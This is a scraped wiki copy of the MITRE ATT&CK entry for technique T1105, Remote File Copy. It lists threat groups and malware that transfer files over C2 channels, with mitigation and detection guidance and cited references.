Remote File Copy

From enterprise
Jump to: navigation, search
Remote File Copy
Technique
ID T1105
Tactic Command and Control, Lateral Movement
Platform Linux, macOS, Windows
Permissions Required User
Data Sources File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring
Requires Network Yes

Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.

Examples

  • APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.12
  • APT3 has a tool that can copy files to remote machines.3
  • APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.4
  • APT34 can download remote files onto victims.5
  • APT37 has downloaded second stage malware from compromised websites.6
  • BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).7
  • Dragonfly downloaded tools from a remote server after they were inside the victim network.8
  • The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.9
  • FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.10
  • FIN7 uses a PowerShell script to launch shellcode that retrieves an additional payload.11
  • FIN8 has used remote code execution to download subsequent payloads.12
  • Tools used by Gamaredon Group are capable of downloading and executing additional payloads.13
  • Several Lazarus Group malware families are capable of downloading and executing binaries from its C2 server.1415
  • Leviathan has downloaded additional scripts and files from adversary-controlled servers.16 Leviathan has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.17
  • Magic Hound has downloaded additional code and files from servers onto victims.18
  • PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.19
  • A Patchwork payload downloads additional malware from the C2 server.20
  • After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.21
  • menuPass has installed updates and new malware on victims.22
  • Agent.btz attempts to download an encrypted binary from a specified domain.23
  • BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.2425
  • can be used to create BITS Jobs to upload and/or download files.26
  • Briba downloads files onto infected hosts.27
  • CHOPSTICK is capable of performing remote file transmission.28
  • CORESHELL downloads another dropper from its C2 server.29
  • CallMe has the capability to download a file to the victim from the C2 server.30
  • ChChes is capable of downloading files, including additional modules.313233
  • China Chopper can upload and download files.17
  • CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.34
  • Crimson contains a command to retrieve files from its C2 server.35
  • creates a backdoor through which remote attackers can upload files.36
  • Daserf can download remote files.377
  • Dipsind can download remote files.38
  • After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.39
  • DustySky searches for network drives and removable media and duplicates itself onto them.40
  • Emissary has the capability to download files from the C2 server.41
  • Felismus can download files from remote servers.42
  • Gazer can execute a task to download a file.4344
  • H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.45
  • can download and execute a second-stage payload.6
  • HTTPBrowser is capable of writing a file to the compromised system from the C2 server.21
  • Helminth can download additional files.46
  • Hi-Zor has the ability to upload and download files from its C2 server.47
  • Hydraq creates a backdoor through which remote attackers can download files and additional malware components.4849
  • JHUHUGIT can retrieve an additional payload from its C2 server.5051
  • JPIN can download files and upgrade itself.38
  • can upload and download files, including second-stage malware.6
  • Kasidet has the ability to download and execute additional files.52
  • LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.53
  • creates a backdoor through which remote attackers can download files onto compromised hosts.54
  • ... further results

Mitigation

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.55

Detection

Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.55

References

  1. ^  Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  2. ^  Unit 42. (2018, February 28). Unit 42 Playbook Viewer - Sofacy. Retrieved March 15, 2018.
  3. ^  Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  4. ^  Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  5. ^  Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  6. a b c  FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
  7. a b  Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  8. ^  US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
  9. ^  Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.
  10. ^  FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.
  11. ^  Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  12. ^  Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  13. ^  Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  14. ^  Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  15. ^  Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  16. ^  Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  17. a b  FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  18. ^  Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  19. ^  Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.
  20. ^  Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
  21. a b  Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved January 25, 2016.
  22. ^  PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  23. ^  Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.
  24. ^  Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
  25. ^  Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  26. ^  Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
  27. ^  Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  28. ^  Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  1. ^  FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  2. ^  Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  3. ^  Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  4. ^  Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  5. ^  FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  6. ^  F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  7. ^  Huss, D.. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  8. ^  Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  9. ^  Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
  10. a b  Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  11. ^  ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  12. ^  ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
  13. ^  Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  14. ^  Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  15. ^  ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  16. ^  Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
  17. ^  Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
  18. ^  Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  19. ^  Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  20. ^  Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
  21. ^  Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
  22. ^  ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  23. ^  Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  24. ^  Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
  25. ^  FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  26. ^  Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
  27. a b  Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.